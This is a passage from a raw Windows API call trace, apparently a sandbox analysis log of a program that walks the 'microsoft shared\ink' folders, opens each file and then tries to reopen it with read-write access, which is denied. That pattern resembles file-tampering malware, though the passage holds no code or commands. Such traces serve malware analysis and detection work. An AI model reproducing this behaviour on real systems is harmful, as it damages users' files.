cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 57 [0098.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.719] GetLastError () returned 0x5 [0098.719] GetLastError () returned 0x5 [0098.719] SetLastError (dwErrCode=0x5) [0098.719] GetLastError () returned 0x5 [0098.719] SetLastError (dwErrCode=0x5) [0098.719] GetLastError () returned 0x5 [0098.719] SetLastError (dwErrCode=0x5) [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0098.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0098.719] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0098.719] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0098.720] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.720] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0098.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0098.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.721] AreFileApisANSI () returned 1 [0098.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0098.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.721] AreFileApisANSI () returned 1 [0098.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85da0 [0098.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 73 [0098.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.721] GetFileType (hFile=0x27c) returned 0x1 [0098.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.722] CloseHandle (hObject=0x27c) returned 1 [0098.722] AreFileApisANSI () returned 1 [0098.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0098.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 73 [0098.722] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.722] GetLastError () returned 0x5 [0098.722] GetLastError () returned 0x5 [0098.722] SetLastError (dwErrCode=0x5) [0098.722] GetLastError () returned 0x5 [0098.722] SetLastError (dwErrCode=0x5) [0098.722] GetLastError () returned 0x5 [0098.723] SetLastError (dwErrCode=0x5) [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0098.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.723] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c5b0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧☀")) returned 0 [0098.723] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0098.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0098.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0098.724] AreFileApisANSI () returned 1 [0098.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpUsedDefaultChar=0x0) returned 57 [0098.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.724] AreFileApisANSI () returned 1 [0098.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0098.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 57 [0098.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.724] GetLastError () returned 0x5 [0098.724] GetLastError () returned 0x5 [0098.724] SetLastError (dwErrCode=0x5) [0098.724] GetLastError () returned 0x5 [0098.724] SetLastError (dwErrCode=0x5) [0098.724] GetLastError () returned 0x5 [0098.724] SetLastError (dwErrCode=0x5) [0098.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.725] AreFileApisANSI () returned 1 [0098.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0098.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 57 [0098.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.725] GetLastError () returned 0x5 [0098.725] GetLastError () returned 0x5 [0098.725] SetLastError (dwErrCode=0x5) [0098.725] GetLastError () returned 0x5 [0098.725] SetLastError (dwErrCode=0x5) [0098.725] GetLastError () returned 0x5 [0098.725] SetLastError (dwErrCode=0x5) [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0098.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0098.725] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.726] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0098.726] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.726] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a3b058, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a3b058, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1b2d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.726] 